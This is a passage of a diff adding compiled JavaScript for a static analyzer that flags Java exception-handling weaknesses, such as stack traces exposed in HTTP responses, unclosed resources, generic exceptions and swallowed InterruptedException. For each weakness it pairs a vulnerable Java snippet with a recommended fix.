+ if ((lowerLine.includes('response.getwriter') || lowerLine.includes('response.write') ||
92
+ lowerLine.includes('printwriter') || lowerLine.includes('servletresponse') ||
93
+ lowerLine.includes('.print')) &&
94
+ (lowerLine.includes('getmessage()') || lowerLine.includes('getstacktrace()') ||
95
+ lowerLine.includes('.getstacktrace') || lowerLine.includes('printstacktrace') ||
96
+ lowerLine.includes('exception'))) {
97
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('exception-details-exposed', 'Exception details may be exposed in HTTP responses', 'Log detailed errors server-side, return generic messages to clients', index + 1, 'Exposing exception details reveals sensitive internal application information to attackers', 'response.getWriter().println(e.getStackTrace()); // exposes full stack trace to client', [
98
+ 'Internal application structure exposure',
99
+ 'File paths and classpath information disclosure',
100
+ 'Database connection details revelation',
101
+ 'Third-party library version fingerprinting'
102
+ ], 'response.getWriter().println(e.getMessage());', 'logger.error("Request processing failed", e); response.sendError(500, "Internal server error");', 'Exception details contain sensitive debugging information that should not be exposed to clients'));
103
+ }
104
+ // Check #4: Resource leaks in exception scenarios - missing try-with-resources or finally
105
+ // FIX (Dec 11, 2025): Skip comments when looking for try-with-resources or finally blocks
106
+ // Previous bug: Comments containing "finally" or ".close()" prevented detection
107
+ // FIX (Dec 25, 2025): Added database connection patterns (DriverManager, createStatement)
108
+ if (((lowerLine.includes('new ') &&
109
+ (lowerLine.includes('fileinputstream') || lowerLine.includes('fileoutputstream') ||
110
+ lowerLine.includes('connection') || lowerLine.includes('socket') ||
111
+ lowerLine.includes('bufferedreader') || lowerLine.includes('bufferedwriter'))) ||
112
+ // Database connection patterns without 'new'
113
+ (lowerLine.includes('drivermanager.getconnection') ||
114
+ lowerLine.includes('datasource.getconnection') ||
115
+ lowerLine.includes('.createstatement') ||
116
+ lowerLine.includes('.preparestatement'))) &&
117
+ !lines.slice(index, Math.min(index + 10, lines.length)).some(nextLine => {
118
+ const trimmedNext = nextLine.trim();
119
+ // Skip comments - they shouldn't count as actual cleanup code
120
+ if (trimmedNext.startsWith('//') || trimmedNext.startsWith('/*') || trimmedNext.startsWith('*')) {
121
+ return false;
122
+ }
123
+ const lowerNext = nextLine.toLowerCase();
124
+ return lowerNext.includes('try (') ||
125
+ lowerNext.includes('finally {') || // More specific: actual finally block, not just the word
126
+ lowerNext.includes('.close()');
127
+ })) {
128
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('resource-leak-exception', 'Resource may not be properly closed in exception scenarios', 'Use try-with-resources statement or ensure cleanup in finally blocks', index + 1, 'Improper resource cleanup during exceptions can lead to resource leaks and denial of service', 'FileInputStream fis = new FileInputStream(file); // no try-with-resources or finally', [
129
+ 'Memory leaks from unclosed resources',
130
+ 'File descriptor exhaustion',
131
+ 'Connection pool depletion',
132
+ 'Denial of service from resource exhaustion'
133
+ ], 'FileInputStream fis = new FileInputStream(file);', 'try (FileInputStream fis = new FileInputStream(file)) { /* operations */ }', 'Resources opened without guaranteed cleanup can cause leaks when exceptions occur'));
134
+ }
135
+ // Check #5: Improper exception propagation - throwing generic exceptions
136
+ if (lowerLine.includes('throw new exception(') ||
137
+ lowerLine.includes('throw new runtimeexception(')) {
138
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('improper-exception-propagation', 'Throwing generic exceptions loses important error context', 'Throw specific exception types that provide meaningful context', index + 1, 'Generic exception throwing can mask the specific nature of security-related errors', 'throw new Exception("Error occurred"); // loses specific security context', [
139
+ 'Loss of security-specific error context',
140
+ 'Difficulty in implementing appropriate error handling',
141
+ 'Reduced ability to detect and respond to security issues',
142
+ 'Poor audit trail for security events'
143
+ ], 'throw new Exception("Validation failed");', 'throw new SecurityException("Authentication failed", originalCause);', 'Generic exceptions prevent proper security-specific error handling and lose important context'));
144
+ }
145
+ // Check #6: printStackTrace() usage (NEW - OWASP 2025)
146
+ // printStackTrace() outputs to System.err and exposes internal information
147
+ if (lowerLine.includes('.printstacktrace()')) {
148
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('printstacktrace-usage', 'printStackTrace() exposes internal application details and should not be used in production', 'Use proper logging framework (SLF4J, Log4j) instead of printStackTrace()', index + 1, 'printStackTrace() outputs full stack traces to System.err, exposing sensitive internal information including class paths, method names, and line numbers that attackers can use for reconnaissance', 'catch (Exception e) { e.printStackTrace(); } // Exposes internal details', [
149
+ 'Internal application structure exposure to attackers',
150
+ 'File paths and classpath information disclosure',
151
+ 'Method and class name fingerprinting',
152
+ 'No centralized logging for security monitoring',
153
+ 'Cannot be disabled in production environments'
154
+ ], 'e.printStackTrace();', 'logger.error("Operation failed", e);', 'printStackTrace() should never be used in production code - use proper logging frameworks that can be configured and monitored'));
155
+ }
156
+ // Check #7: Swallowing InterruptedException (NEW - OWASP 2025)
157
+ // Catching InterruptedException without restoring interrupted status
158
+ if (lowerLine.includes('catch') && lowerLine.includes('interruptedexception')) {
159
+ // Check if the catch block restores interrupt status or re-throws
160
+ const catchBlockEnd = lines.slice(index + 1, Math.min(index + 10, lines.length));
161
+ const restoresInterrupt = catchBlockEnd.some(line => {
162
+ const lowerNext = line.toLowerCase();
163
+ return lowerNext.includes('thread.currentthread().interrupt()') ||
164
+ lowerNext.includes('throw ');
165
+ });
166
+ if (!restoresInterrupt) {
167
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('swallowed-interrupted-exception', 'InterruptedException caught without restoring thread interrupted status', 'Call Thread.currentThread().interrupt() to restore interrupted status or re-throw the exception', index + 1, 'Swallowing InterruptedException without restoring the interrupted flag prevents proper thread cancellation and can lead to hung threads, resource leaks, and denial of service', 'catch (InterruptedException e) { logger.error("Interrupted", e); } // Lost interrupt status!', [
168
+ 'Thread cancellation mechanisms broken',
169
+ 'Application shutdown hangs and timeouts',
170
+ 'Resource leaks from threads that cannot be stopped',
171
+ 'Denial of service from thread pool exhaustion',
172
+ 'Unpredictable application behavior under load'
173
+ ], 'catch (InterruptedException e) { /* ignore */ }', 'catch (InterruptedException e) { Thread.currentThread().interrupt(); logger.warn("Interrupted", e); }', 'InterruptedException indicates thread cancellation request - always restore interrupted status with Thread.currentThread().interrupt() or re-throw'));
174
+ }
175
+ }
176
+ });
177
+ return vulnerabilities;
178
+ }
179
+ //# sourceMappingURL=exception-handling.js.map